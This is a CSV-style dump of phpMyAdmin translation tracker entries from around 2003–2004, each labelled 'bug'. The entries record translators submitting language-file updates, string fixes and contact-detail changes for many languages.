"24444","3505","Portuguese update.
Hope this time I get it going again!
strStatCreateTime strStatUpdateTime strStatCheckTime strPerMinute strPerSecond strSortByKey strPrintViewFull strImportFiles strQuerySQLHistory strAutodetect strQueryWindowLock Original URL https sourceforge.net p phpmyadmin translations 474 https sourceforge.net p phpmyadmin translations 474 Original author cfmsoft","bug"
"24444","3506","spanish update for 2.5.5.
Hi Marc, Here is the requested update.
It includes the translation for strUpgrade = You should upgrade to s s or later.
; Please disregard the previous update for 2.5.5.
All the very best, Daniel Original URL https sourceforge.net p phpmyadmin translations 475 https sourceforge.net p phpmyadmin translations 475 Original author hinostroza","bug"
"24444","3507","Updated indonesian translation.
Updated indonesian translations CVS 20 11 03) Original URL https sourceforge.net p phpmyadmin translations 476 https sourceforge.net p phpmyadmin translations 476 Original author tamsy","bug"
"24444","3508","Indonesian Translation Update.
The forgotten String strAddConstraints = Original URL https sourceforge.net p phpmyadmin translations 477 https sourceforge.net p phpmyadmin translations 477 Original author tamsy","bug"
"24444","3509","Hindi Translation author email lost.
Hello Friends, I would like to tell you that my previous email address amp;quot;girishn nagpur.dot.net.in amp;quot; is not accessible due to some change of policy of the ISP, and i was not aware of it as i was out of city for a long time.
Please can someone change the email id to amp;quot;girishn2003 yahoo.co.in amp;quot; in the Translators page.
for this entry Hindi | Girish Nair email lost) Thanks, Girish Nair Original URL https sourceforge.net p phpmyadmin translations 478 https sourceforge.net p phpmyadmin translations 478 Original author girish nair","bug"
"24444","3510","Chinese BIG5 UPDATE.
update Original URL https sourceforge.net p phpmyadmin translations 479 https sourceforge.net p phpmyadmin translations 479 Original author siusun","bug"
"24444","3511","Latvian translation UPDATE.
Hi!
This is for the current cvs version.
Original URL https sourceforge.net p phpmyadmin translations 480 https sourceforge.net p phpmyadmin translations 480 Original author saaa2002","bug"
"24444","3512","Hindi Translation Updates.
Hi Admin, Please find the zip file having some more translations.
The translated items are marked as amp;quot; translated amp;quot; at the end of each line.
Thanks, Girish Original URL https sourceforge.net p phpmyadmin translations 481 https sourceforge.net p phpmyadmin translations 481 Original author girish nair","bug"
"24444","3513","slovak translation update.
slovak translation update Original URL https sourceforge.net p phpmyadmin translations 482 https sourceforge.net p phpmyadmin translations 482 Original author erkac","bug"
"24444","3514","Spanish update for 2.5.5. strAddConstraints = Axc5x84ada constrexc5x84imientos ; All the very best, Daniel Original URL https sourceforge.net p phpmyadmin translations 483 https sourceforge.net p phpmyadmin translations 483 Original author hinostroza","bug"
"24444","3515","Serbian update for 2.5.5.
Serbian update for 2.5.5 cyrillic and latin) Original URL https sourceforge.net p phpmyadmin translations 484 https sourceforge.net p phpmyadmin translations 484 Original author mikis","bug"
"24444","3516","Norwegian update.
Norwegian update Original URL https sourceforge.net p phpmyadmin translations 485 https sourceforge.net p phpmyadmin translations 485 Original author sven erik","bug"
"24444","3517","Bulgarian Translation Update.
Id bulgarian windows 1251.inc.php,v 2.2 2003 11 20 13 48 51 nijel Exp Original URL https sourceforge.net p phpmyadmin translations 486 https sourceforge.net p phpmyadmin translations 486 Original author stanprog","bug"
"24444","3518","Danish updated to 2.5.4.
As the danish langfile has been poorly maintained lately, I ve written a much needed update. )
Original URL https sourceforge.net p phpmyadmin translations 487 https sourceforge.net p phpmyadmin translations 487 Original author alleyman01","bug"
"24444","3519","Estonian language update.
3 new strings, some small fixes Original URL https sourceforge.net p phpmyadmin translations 488 https sourceforge.net p phpmyadmin translations 488 Original author finsoft","bug"
"24444","3520","Estonian language update.
2 language string fixes Original URL https sourceforge.net p phpmyadmin translations 489 https sourceforge.net p phpmyadmin translations 489 Original author finsoft","bug"
"24444","3521","Danish lang file for 2.5.5.
Danish Dansk Errorreports, plz write me through SF, thx.
Fejlrapporter, kontakt mig via SF, tak.
Original URL https sourceforge.net p phpmyadmin translations 490 https sourceforge.net p phpmyadmin translations 490 Original author alleyman01","bug"
"24444","3522","Hindi Translation Adding hindi windows lang file.
Hi Admin, I would request you to add a hindi windows ???
?.php file to the languages.
The point is that on a windows 2000 server, there is no requiremnt of the allow recoding=TRUE, and also the translations work without iconv libiconv etc.
So i hope you can add the same amp;quot;hindi utf 8.inc.php amp;quot; file for the windows hindi windows ????.php).
with some minimum config changes.
Please let me know if you want me to test some thing on my side.
also how to test it.
Regards, Girish Original URL https sourceforge.net p phpmyadmin translations 491 https sourceforge.net p phpmyadmin translations 491 Original author girish nair","bug"
"24444","3523","lithuanian translation.
lithuanian translation Original URL https sourceforge.net p phpmyadmin translations 492 https sourceforge.net p phpmyadmin translations 492 Original author viliusz","bug"
"24444","3524","Updated indonesian translation.
Updated indonesian translation CVS 17 12 03) Original URL https sourceforge.net p phpmyadmin translations 493 https sourceforge.net p phpmyadmin translations 493 Original author tamsy","bug"
"24444","3525","Updated norwegian language file.
Here s an ppdated norwegian language file.
Wish you all a Merry X mas and a Happy New Year!
Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 494 https sourceforge.net p phpmyadmin translations 494 Original author sven erik","bug"
"24444","3526","Farsi Language support.
it s has been done already by me Farhad jabbari) www.irandar.com fully working.
doesn t need any Farsi windows or Arabic version.
as long as you have latest IE or other browser works fine.
please do download http www.irandar.com farsiphpmyadmin.zip Thanks Farhad Jabbari Original URL https sourceforge.net p phpmyadmin translations 495 https sourceforge.net p phpmyadmin translations 495 Original author anonymous","bug"
"24444","3527","Swedish.
Swedish translation of new strings.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 496 https sourceforge.net p phpmyadmin translations 496 Original author bjornth","bug"
"24444","3528","Two updates for Spanish iso 8859 1.inc.php.
Hi, Here are a couple of updates for the Spanish language.
All the very best, Daniel strSend = Enviar genera un archivo descargable) ; strFileNameTemplateHelp = Use DB para conservar el nombre de la base de datos, TABLE para usar el nombre de la tabla y las opciones sany strftime s para especificaciones de tiempo; la extensixc3xb3n .sql, .cvs, etc.)
se axc5x84adirxc3xa1 automxc3xa1ticamente.
Cualquier otro texto serxc3xa1 conservado.
; Original URL https sourceforge.net p phpmyadmin translations 497 https sourceforge.net p phpmyadmin translations 497 Original author hinostroza","bug"
"24444","3529","italian) affected = affette??.
I ve found a bad translation from english to italian of the affected words.
It appears when modify a set of) row.
It has translated as affette and is bad, and not used in Italian.
The right mean should be interessate .
There are others words not translated in 2.5.5 version if you want I can do it.
Vincenzo lt;ervincio tiscali.it gt; Original URL https sourceforge.net p phpmyadmin translations 498 https sourceforge.net p phpmyadmin translations 498 Original author anonymous","bug"
"24444","3530","Portuguese translation.
portuguese iso 8859 1.inc.php,v 2.7 2003 12 30 Original URL https sourceforge.net p phpmyadmin translations 499 https sourceforge.net p phpmyadmin translations 499 Original author lopopizarro","bug"
"24444","3531","danish language for 2.5.6 RC1.
Danish, updated to 2.5.6 RC1 Dansk til phpMyAdmin v. 2.5.6 RC1, planlagt til primo februar.
Original URL https sourceforge.net p phpmyadmin translations 503 https sourceforge.net p phpmyadmin translations 503 Original author alleyman01","bug"
"24444","3532","Updated catalan from lastest cvs.
Updated catalan iso 8859 1.inc.php from the lastest CVS version 2.7, with some translation errors corrected.
Original URL https sourceforge.net p phpmyadmin translations 500 https sourceforge.net p phpmyadmin translations 500 Original author xavin","bug"
"24444","3533","Update e mail address from translators list.
Hi guys!
Do you can update my e mail address in the translators list to my new one?
klingonempire tiscali.es Thanks!
Regards.
Xavier Navarro.
Girona Spain.
Original URL https sourceforge.net p phpmyadmin translations 501 https sourceforge.net p phpmyadmin translations 501 Original author xavin","bug"
"24444","3534","italian update.
updates Original URL https sourceforge.net p phpmyadmin translations 502 https sourceforge.net p phpmyadmin translations 502 Original author danone","bug"
"24444","3535","slovak translation update.
hi, here is slovak translation update.
bye Original URL https sourceforge.net p phpmyadmin translations 504 https sourceforge.net p phpmyadmin translations 504 Original author erkac","bug"
"24444","3536","Updated norwegian from lastest cvs.
Updated norwegian from lastest cvs.
Original URL https sourceforge.net p phpmyadmin translations 505 https sourceforge.net p phpmyadmin translations 505 Original author sven erik","bug"
"24444","3537","Spanish update for 2.5.6.
Hi, Here is the requested translation strGeorgian = Georgiano ; strCzechSlovak = Checo Eslovaco ; strTransformation application octetstream download = Muestre un enlace para descargar los datos binarios de un campo.
La primera opcixc3xb3n es el nombre del archivo binario.
La segunda opcixc3xb3n es un nombre de campo factible de una fila de la tabla que contiene el nombre del campo.
Si usted aporta una segunda opcixc3xb3n, necesariamente deberxc3xa1 consignar la primera opcixc3xb3n a un string vacxc3xado ; strMaximumSize = Tamaxc5x84o mxc3xa1ximo s s ; One question aren t Czech and Slovak two different languages?
The country split into two Republics... All the very best, Daniel Original URL https sourceforge.net p phpmyadmin translations 506 https sourceforge.net p phpmyadmin translations 506 Original author hinostroza","bug"
"24444","3538","Serbian update for 2.5.6.
Hi, here is the updated Serbian translation for 2.5.6 both cyrillic and latin).
Original URL https sourceforge.net p phpmyadmin translations 507 https sourceforge.net p phpmyadmin translations 507 Original author mikis","bug"
"24444","3539","Dutch Languagefile.
Well it seems it didn t correctly attach the file in my previous post.
Lets try again ) Ivo Teel Original URL https sourceforge.net p phpmyadmin translations 508 https sourceforge.net p phpmyadmin translations 508 Original author calimonk","bug"
"24444","3540","Catalan update for 2.5.6.
Lastest file with all translated messages Original URL https sourceforge.net p phpmyadmin translations 509 https sourceforge.net p phpmyadmin translations 509 Original author xavin","bug"
"24444","3541","Indonesian Translation Update.
Indonesian Translation Update CVS 27 02 2004) Original URL https sourceforge.net p phpmyadmin translations 512 https sourceforge.net p phpmyadmin translations 512 Original author tamsy","bug"
"24444","3542","Estonian language file update.
new strings Original URL https sourceforge.net p phpmyadmin translations 510 https sourceforge.net p phpmyadmin translations 510 Original author finsoft","bug"
"24444","3543","Updated Norwegian languagefile from lastest cvs.
Updated norwegian languagefile from lastest cvs version, v2.11.
With strConnectionError) Original URL https sourceforge.net p phpmyadmin translations 511 https sourceforge.net p phpmyadmin translations 511 Original author sven erik","bug"
"24444","3544","Correction for Malay week day names.
34 Does the malay week only have 6 days???
Please re translate!
35 day of week = array Aha , Isn , Sel , Rab , Kha , Jum ); Aha = Ahad = Sunday Isn = Isnin = Monday Sel = Selasa = Tuesday Rab = Rabu = Wednesday Kha = Khamis = Thursday Jum = Jumaat = Friday Sab = Sabtu = Saturday Original URL https sourceforge.net p phpmyadmin translations 514 https sourceforge.net p phpmyadmin translations 514 Original author anonymous","bug"
"24444","3545","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 513 https sourceforge.net p phpmyadmin translations 513 Original author ubanus","bug"
"24444","3546","Updated Norwegian languagefile from lastest cvs.
Updated Norwegian languagefile from lastest cvs norwegian iso 8859 1.inc.php,v 2.19 Original URL https sourceforge.net p phpmyadmin translations 515 https sourceforge.net p phpmyadmin translations 515 Original author sven erik","bug"
"24444","3547","automagisch gt; automatisch.
Change automagisch to automatisch.
It s a spelling error!
Original URL https sourceforge.net p phpmyadmin translations 516 https sourceforge.net p phpmyadmin translations 516 Original author anonymous","bug"
"24444","3548","Lithuanian translation.
Update version Original URL https sourceforge.net p phpmyadmin translations 517 https sourceforge.net p phpmyadmin translations 517 Original author viliusz","bug"
"24444","3549","Spanish contact email address change.
Dear Sirs, I am being bombed by spam.
I suspect that the Official translators email I have posted for contact is one of the the culprits.
I have set up a new email address specifically to keep giving support to newbies.
This new email will automatically delete every message except Subject [phpMyAdmin translation] Feedback In turn, every email that contains the above mentioned subject will send an automated response with the partial translation in Spanish of the documentation and tips for setting phpMyAdmin.
A copy of these messages will be kept to see if I missed a question out of the scope of the automated response.
So, please change my current Official translators email to phpmyadmin cerebroperiferico.com The email you have for internal correspondence with me via sourceforge remains the same.
All the very best, Dr. Daniel Hinostroza C. PS please let me know when this change is confirmed.
Original URL https sourceforge.net p phpmyadmin translations 518 https sourceforge.net p phpmyadmin translations 518 Original author hinostroza","bug"
"24444","3550","Estonian language update.
new strings Original URL https sourceforge.net p phpmyadmin translations 519 https sourceforge.net p phpmyadmin translations 519 Original author finsoft","bug"
"24444","3551","Updated slovenian translation.
Updated slovenian translation Original URL https sourceforge.net p phpmyadmin translations 520 https sourceforge.net p phpmyadmin translations 520 Original author urosh","bug"
"24444","3552","Swedish for 2.6.0.
Swedish translation of new messages for 2.6.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 521 https sourceforge.net p phpmyadmin translations 521 Original author bjornth","bug"
"24444","3553","Updated Norwegian languagefile from lastest cvs.
Updated Norwegian languagefile from lastest cvs norwegian iso 8859 1.inc.php v 2.23) Original URL https sourceforge.net p phpmyadmin translations 522 https sourceforge.net p phpmyadmin translations 522 Original author sven erik","bug"
"24444","3554","slovak translation update.
translation update from latest cvs.
Original URL https sourceforge.net p phpmyadmin translations 523 https sourceforge.net p phpmyadmin translations 523 Original author erkac","bug"
"24444","3555","Latest Serbian translation for 2.6.0 after beta3).
Here is updated Serbian translation both Cyrillic and Latin) for version 2.6.0. duh, forgot to log in).
Original URL https sourceforge.net p phpmyadmin translations 524 https sourceforge.net p phpmyadmin translations 524 Original author mikis","bug"
"24444","3556","Dutch lang update.
Hi, I ve had some time to update the dutch lang files.
The new strings have been translated and alot of spellings errors and typos have been fixed.
Ivo Teel Original URL https sourceforge.net p phpmyadmin translations 525 https sourceforge.net p phpmyadmin translations 525 Original author calimonk","bug"
"24444","3557","Indonesian Language Update.
Indonesian language file update CVS 17 05 04) Original URL https sourceforge.net p phpmyadmin translations 530 https sourceforge.net p phpmyadmin translations 530 Original author tamsy","bug"
"24444","3558","danish for 2.6.0.
Nothing special here, just updated according to latest mailinglist ) all sorted into place i think.
Comments are as usual VERY welcome but please write me directly.
Original URL https sourceforge.net p phpmyadmin translations 531 https sourceforge.net p phpmyadmin translations 531 Original author dk alleykat","bug"
"24444","3559","Swedish for 2.6.0.
Swedish translation of new messages fxc3xb6r 2.6.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 534 https sourceforge.net p phpmyadmin translations 534 Original author bjornth","bug"
"24444","3560","or in strMIME transformation options note.
There is or instead of nebo , here is the patch.
Original URL https sourceforge.net p phpmyadmin translations 526 https sourceforge.net p phpmyadmin translations 526 Original author anonymous","bug"
"24444","3561","Dutch Lang Attachment now!).
Hi, I ve had some time to update the dutch lang files.
The new strings have been translated and alot of spellings errors and typos have been fixed.
Ivo Teel Original URL https sourceforge.net p phpmyadmin translations 527 https sourceforge.net p phpmyadmin translations 527 Original author anonymous","bug"
"24444","3562","Updated norwegian from lastest cvs.
Updated norwegian from lastest cvs based on norwegian iso 8859 1.inc.php v 2.28.
Original URL https sourceforge.net p phpmyadmin translations 528 https sourceforge.net p phpmyadmin translations 528 Original author sven erik","bug"
"24444","3563","Estonian language update.
New strings Original URL https sourceforge.net p phpmyadmin translations 529 https sourceforge.net p phpmyadmin translations 529 Original author finsoft","bug"
"24444","3564","Indonesian Language Update.
Indonesian Language Update CVS 08 June 04) Original URL https sourceforge.net p phpmyadmin translations 532 https sourceforge.net p phpmyadmin translations 532 Original author tamsy","bug"
"24444","3565","bulgarian windows 1251.inc.php,v 2.29.
Id bulgarian windows 1251.inc.php,v 2.29 2004 06 10 14 10 42 lem9 Exp Original URL https sourceforge.net p phpmyadmin translations 533 https sourceforge.net p phpmyadmin translations 533 Original author stanprog","bug"
"24444","3566","Azeri UTF 8.
There are Azerbaijani version of phpMyAdmin.
But our standart alphabets in UTF 8 coding.
Older body who translated it he wrote it in ISO charset and not full translation but tranleteration.
For example must X amp; 601;ta But he wrote Xeta It`s not correct.
I tranlated it correctly.
Thanks...
Original URL https sourceforge.net p phpmyadmin translations 535 https sourceforge.net p phpmyadmin translations 535 Original author aliev","bug"
"24444","3567","Catalan messages for 2.6.0.
Hi folks!
Here is the translation of the messages for 2.6.0 Best regards.
Xavier Navarro.
Girona Spain Original URL https sourceforge.net p phpmyadmin translations 536 https sourceforge.net p phpmyadmin translations 536 Original author xavin","bug"
"24444","3568","Galician Some recent strings this time with file!.
Some recent strings have been translated Original URL https sourceforge.net p phpmyadmin translations 540 https sourceforge.net p phpmyadmin translations 540 Original author xosecalvo","bug"
"24444","3569","Swedish for 2.6.0.
Swedish translation of new messages for 2.6.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 541 https sourceforge.net p phpmyadmin translations 541 Original author bjornth","bug"
"24444","3570","Lastest catalan messages for 2.6.0.
Hi folks!
These are the lastest messages for 2.6.0 translated to catalan strIcelandic = Islandxc3xa9s ; strLatvian = Letxc3xb3 ; strPolish = Polac ; strRomanian = Romanxc3xa9s ; strSlovenian = Eslovxc3xa9 ; strTraditionalSpanish = Espanyol Tradicional ; strSlovak = Eslovac ; strMySQLConnectionCollation = Ordenacixc3xb3 de la connexixc3xb3 MySQL ; Regards.
Xavier Navarro Original URL https sourceforge.net p phpmyadmin translations 542 https sourceforge.net p phpmyadmin translations 542 Original author xavin","bug"
"24444","3571","slovak translation update.
Hi, here is small slovak translation update.
Please merge it.
Bye.
Original URL https sourceforge.net p phpmyadmin translations 537 https sourceforge.net p phpmyadmin translations 537 Original author erkac","bug"
"24444","3572","Dutch lang update.
Hi, I ve attached the 2 new dutch language files, correctly named this time ;) Ivo Teel Original URL https sourceforge.net p phpmyadmin translations 538 https sourceforge.net p phpmyadmin translations 538 Original author calimonk","bug"
"24444","3573","Catalan translation of the last message for 2.6.0.
Hi!
This is the catalan translation of the last message for 2.6.0 strHexForBinary = Usa hexadecimal per camps binaris ; Best regards.
Xavier Navarro.
Girona Spain Original URL https sourceforge.net p phpmyadmin translations 539 https sourceforge.net p phpmyadmin translations 539 Original author xavin","bug"
"24444","3574","Swedish for 2.6.0.
Swedish translation of new messages for 2.6.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 543 https sourceforge.net p phpmyadmin translations 543 Original author bjornth","bug"
"24444","3575","Galician New strings in revision 2.3.7.
Collation al.
Original URL https sourceforge.net p phpmyadmin translations 544 https sourceforge.net p phpmyadmin translations 544 Original author xosecalvo","bug"
"24444","3576","i update japanese lang files.. i update japanese lang files.
i also had Mr. Yukihiro KAWADA check.
Original URL https sourceforge.net p phpmyadmin translations 545 https sourceforge.net p phpmyadmin translations 545 Original author elf2000","bug"
"24444","3577","slovak translation update.
Hi, here is slovak transaltion update iso8859 2).
Original URL https sourceforge.net p phpmyadmin translations 546 https sourceforge.net p phpmyadmin translations 546 Original author erkac","bug"
"24444","3578","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 547 https sourceforge.net p phpmyadmin translations 547 Original author ubanus","bug"
"24444","3579","turkish update again!).
up to date translation.
Original URL https sourceforge.net p phpmyadmin translations 548 https sourceforge.net p phpmyadmin translations 548 Original author boralioglu","bug"
"24444","3580","Estonian language update.
new strings Original URL https sourceforge.net p phpmyadmin translations 550 https sourceforge.net p phpmyadmin translations 550 Original author finsoft","bug"
"24444","3581","Updated norwegian from lastest cvs.
Updated Norwegian translation based on the latest CVS file, norwegian iso 8859 1.inc.php v 2.40.
Original URL https sourceforge.net p phpmyadmin translations 549 https sourceforge.net p phpmyadmin translations 549 Original author sven erik","bug"
"24444","3582","new chinese translation for phpMyAdmin 2.6.0 rc1.
full translation Original URL https sourceforge.net p phpmyadmin translations 551 https sourceforge.net p phpmyadmin translations 551 Original author simon2san","bug"
"24444","3583","latvian update for 2.6.0 rc1.
hi, this is just an update for the latest 2.6.0 rc1 release.
i translated the latests strings you ve added.
both encodings are here.
regards sandis Original URL https sourceforge.net p phpmyadmin translations 552 https sourceforge.net p phpmyadmin translations 552 Original author saaa2002","bug"
"24444","3584","Update of Bulgarian translation.
bulgarian windows 1251.inc.php Translation is based on Id bulgarian windows 1251.inc.php,v 2.29 2004 06 10 14 10 42 lem9 Exp Original URL https sourceforge.net p phpmyadmin translations 553 https sourceforge.net p phpmyadmin translations 553 Original author stanprog","bug"
"24444","3585","Thai translate update.
fix typos add some new translations Original URL https sourceforge.net p phpmyadmin translations 554 https sourceforge.net p phpmyadmin translations 554 Original author bacteria","bug"
"24444","3586","japanese translation update.. brushup.
Almost was translated.
I do not know where a transform relationship is used...
Original URL https sourceforge.net p phpmyadmin translations 555 https sourceforge.net p phpmyadmin translations 555 Original author elf2000","bug"
"24444","3587","Wrong translation in NL.
On the database overview page, below there s a string check overheaded , to select all overheaded tables, in Dutch this is translated as Controleer overhead , this is correct, but not in this context, it should be something like Selecteer tabellen met overhead Regards, Ruben Original URL https sourceforge.net p phpmyadmin translations 556 https sourceforge.net p phpmyadmin translations 556 Original author lambda1","bug"
"24444","3588","new chinese lang update.
fix some bugs Original URL https sourceforge.net p phpmyadmin translations 557 https sourceforge.net p phpmyadmin translations 557 Original author simon2san","bug"
"24444","3589","Missing russian strings.
Please see the attached ZIP file.
Sorry had trouble with my attachment submition Original URL https sourceforge.net p phpmyadmin translations 558 https sourceforge.net p phpmyadmin translations 558 Original author anonymous","bug"
"24444","3590","Updated Albanian translation.
albanian utf 8.inc.php Original URL https sourceforge.net p phpmyadmin translations 559 https sourceforge.net p phpmyadmin translations 559 Original author laurenti","bug"
"24444","3591","latvian translation, update.
just some typos fixed Original URL https sourceforge.net p phpmyadmin translations 560 https sourceforge.net p phpmyadmin translations 560 Original author saaa2002","bug"
"24444","3592","turkish revision and update.
update Original URL https sourceforge.net p phpmyadmin translations 561 https sourceforge.net p phpmyadmin translations 561 Original author boralioglu","bug"
"24444","3593","update chinese lang file.
update chinese lang file Original URL https sourceforge.net p phpmyadmin translations 562 https sourceforge.net p phpmyadmin translations 562 Original author simon2san","bug"
"24444","3594","Updated Norwegian languagefile.
Updated translation from the latest CVS version.
Translated the strPersian string.
Original URL https sourceforge.net p phpmyadmin translations 563 https sourceforge.net p phpmyadmin translations 563 Original author sven erik","bug"
"24444","3595","Updated indonesian translation.
Updated indonesian translation CVS 23 09 04) Original URL https sourceforge.net p phpmyadmin translations 564 https sourceforge.net p phpmyadmin translations 564 Original author tamsy","bug"
"24444","3596","Spanish update for 2.6.0rc3.
strPersian = Persa ; All the very best, Daniel Hinostroza dhinostroza medscape.com Original URL https sourceforge.net p phpmyadmin translations 565 https sourceforge.net p phpmyadmin translations 565 Original author anonymous","bug"
"24444","3597","updates.
italian updates fixed req id 871099 affected=affette bug any suggestion welcome bye Pietro Original URL https sourceforge.net p phpmyadmin translations 566 https sourceforge.net p phpmyadmin translations 566 Original author pdanesi","bug"
"24444","3598","Last Catalan message for 2.6.0.
Hi folks, This is the Catalan translation for the last message for 2.6.0 strPersian = Persa ; Regards, Xavier Navarro Girona Spain Original URL https sourceforge.net p phpmyadmin translations 567 https sourceforge.net p phpmyadmin translations 567 Original author xavin","bug"
"24444","3599","Polish update.
Polish update strPersian = Perski ; Original URL https sourceforge.net p phpmyadmin translations 568 https sourceforge.net p phpmyadmin translations 568 Original author ubanus","bug"
"24444","3600","Swedish for 2.6.0.
Swedish translation of new message for 2.6.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 569 https sourceforge.net p phpmyadmin translations 569 Original author bjornth","bug"
"24444","3601","Serbian update for 2.6.0 rc3.
Serbian translation update for 2.6.0 rc3 translated strPersian) Original URL https sourceforge.net p phpmyadmin translations 570 https sourceforge.net p phpmyadmin translations 570 Original author mikis","bug"
"24444","3602","Danish update 2.6.0 rc3 .
Given a good overhaul with help from the danish DB NG; Persian added.
Greetings from DK, keep up the good work.
D Original URL https sourceforge.net p phpmyadmin translations 571 https sourceforge.net p phpmyadmin translations 571 Original author dk alleykat","bug"
"24444","3603","Dutch lang file update.
Hi, Updated the dutch lang file, attached it.
Ivo Teel Original URL https sourceforge.net p phpmyadmin translations 572 https sourceforge.net p phpmyadmin translations 572 Original author calimonk","bug"
"24444","3604","Select Traditional Chinese for zh hk.
I have update the language file.
After I have tested with great new version 2.6.0, I have found a issue on detect language in HK.
If user set the language to Chinese HK), phpmyadmin use China Simplified Chiense) for default language.
I have added this line in libraries select lang.lib.php line no 155 and work fine.
zh hk = gt; array zh[ ]hk|chinese traditional , chinese traditional big5 , zh hk ), Original URL https sourceforge.net p phpmyadmin translations 573 https sourceforge.net p phpmyadmin translations 573 Original author siusun","bug"
"24444","3605","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 574 https sourceforge.net p phpmyadmin translations 574 Original author pdanesi","bug"
"24444","3606","Updated norwegian from lastest CVS.
Updated Norwegian translation based on CVS revision 2.47.
Original URL https sourceforge.net p phpmyadmin translations 575 https sourceforge.net p phpmyadmin translations 575 Original author sven erik","bug"
"24444","3607","turkish update 2.48. i only send updated lines.please place them on the lang files.thank you.
Original URL https sourceforge.net p phpmyadmin translations 576 https sourceforge.net p phpmyadmin translations 576 Original author boralioglu","bug"
"24444","3608","4 new strings.
4 recent strings Original URL https sourceforge.net p phpmyadmin translations 577 https sourceforge.net p phpmyadmin translations 577 Original author xosecalvo","bug"
"24444","3609","Estonian language update.
new strings Original URL https sourceforge.net p phpmyadmin translations 578 https sourceforge.net p phpmyadmin translations 578 Original author finsoft","bug"
"24444","3610","Updated Norwegian language file.
Updated Norwegian language file based on CVS v 2.55.
Original URL https sourceforge.net p phpmyadmin translations 579 https sourceforge.net p phpmyadmin translations 579 Original author sven erik","bug"
"24444","3611","Danish update.
Correcting a small typo ) Please check that there s no newline after ending ?
gt; I don t trust my editor.
| Original URL https sourceforge.net p phpmyadmin translations 580 https sourceforge.net p phpmyadmin translations 580 Original author dk alleykat","bug"
"24444","3612","Updated Indonesian translation.
Updated Indonesian translation CVS Nov. 07, 2004) Original URL https sourceforge.net p phpmyadmin translations 581 https sourceforge.net p phpmyadmin translations 581 Original author tamsy","bug"
"24444","3613","Japanese translation update.. Japanese translation update 2004 11 10) Original URL https sourceforge.net p phpmyadmin translations 582 https sourceforge.net p phpmyadmin translations 582 Original author elf2000","bug"
"24444","3614","latvian update.
the form checker says body can not be empty , ok 1 typo fixed, 1 new label translated.
a lot of work, hehe ) Original URL https sourceforge.net p phpmyadmin translations 583 https sourceforge.net p phpmyadmin translations 583 Original author saaa2002","bug"
"24444","3615","Hungarian language file useing o and u instead of corrects.
Hello, The Hungarian iso 8859 2 language file is useing o and u instead of amp; 337; latin letter o with double acute) and amp; 369; latin letter u with double acute).
I suggest the use these o gt; 0337 gt; 0337) u gt; 0369 gt; 0369) and for the uppercases O gt; 0336 gt; 0336) U gt; 0368 gt; 0368) without the space beetwen the and 0. thanks, FTeR Original URL https sourceforge.net p phpmyadmin translations 584 https sourceforge.net p phpmyadmin translations 584 Original author fter","bug"
"24444","3616","Updated Serbian translation for 2.6.1.
Updated Serbian translation for 2.6.1 Cyrillic and Latin) Original URL https sourceforge.net p phpmyadmin translations 585 https sourceforge.net p phpmyadmin translations 585 Original author mikis","bug"
"24444","3617","Catalan update for 2.6.1.
Hi Folks, Here is the catalan update for 2.6.1 Regards, Xavier Navarro.
Original URL https sourceforge.net p phpmyadmin translations 586 https sourceforge.net p phpmyadmin translations 586 Original author xavin","bug"
"24444","3618","danish for 2.6.1.
Can t wait for having PMA return imported filenames after import ;) Original URL https sourceforge.net p phpmyadmin translations 587 https sourceforge.net p phpmyadmin translations 587 Original author dk alleykat","bug"
"24444","3619","Galician update.
New strings have been traslated.
Also, some older strings have been revised.
Original URL https sourceforge.net p phpmyadmin translations 588 https sourceforge.net p phpmyadmin translations 588 Original author xosecalvo","bug"
"24444","3620","Polish update.
Polish update Original URL https sourceforge.net p phpmyadmin translations 589 https sourceforge.net p phpmyadmin translations 589 Original author ubanus","bug"
"24444","3621","Traditional Chinese Update.
updated and some old translated text changed.
Original URL https sourceforge.net p phpmyadmin translations 590 https sourceforge.net p phpmyadmin translations 590 Original author siusun","bug"
"24444","3622","Spanish update for 2.6.1 rc1.
As requested.
All the very best, Daniel Hinostroza dhinostroza medscape.com Original URL https sourceforge.net p phpmyadmin translations 591 https sourceforge.net p phpmyadmin translations 591 Original author anonymous","bug"
"24444","3623","ultimate turkish update ).
ok thats it!
Original URL https sourceforge.net p phpmyadmin translations 592 https sourceforge.net p phpmyadmin translations 592 Original author boralioglu","bug"
"24444","3624","Swedish for 2.6.1.
Swedish translation of new messages for 2.6.1 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 593 https sourceforge.net p phpmyadmin translations 593 Original author bjornth","bug"
"24444","3625","Updated Norwegian translation.
Updated Norwegian translation based on norwegian iso 8859 1.inc v.2.59.
Original URL https sourceforge.net p phpmyadmin translations 594 https sourceforge.net p phpmyadmin translations 594 Original author sven erik","bug"
"24444","3626","Documentation ja.html for 2.6.1 rc1.
In fact, update for the japanese document for phpmyadmin Req ID 1075777; posted by elf2000) in the patch tracker.
Charset shift jis Original URL https sourceforge.net p phpmyadmin translations 595 https sourceforge.net p phpmyadmin translations 595 Original author tcool","bug"
"24444","3627","Updated latvian translation for 2.6.1 rc1.
Please take the file atached.
Original URL https sourceforge.net p phpmyadmin translations 596 https sourceforge.net p phpmyadmin translations 596 Original author saaa2002","bug"
"24444","3628","Catalan translation last minute messages for 2.6.1.
Hi Folks, This is the Catalan translation for the last messages begin strSQLExportCompatibility = Compatibilitat d\ exportacixc3xb3 SQL ; strMbOverloadWarning = Teniu activada la funcixc3xb3 mbstring.func overload a la configuracixc3xb3 del vostre PHP.
Aquesta opcixc3xb3 xc3xa9s incompatible amb phpMyAdmin i pot provocar la perdua de dades!
; strMbExtensionMissing = No s\ ha trobat la extensixc3xb3 de PHP mbstring i sembla que feu servir un joc de caracters multibyte.
Sense la extensixc3xb3 mbstring, phpMyAdmin xc3xa9s incapaxc3xa7 de dividir cadenes de text correctament i pot generar resultats inesperats.
; strAfterInsertNext = Editar el segxc3xbcent registre ; end Best regards and happy New Year!!
Xavier Navarro.
Girona Spain.
Original URL https sourceforge.net p phpmyadmin translations 597 https sourceforge.net p phpmyadmin translations 597 Original author xavin","bug"
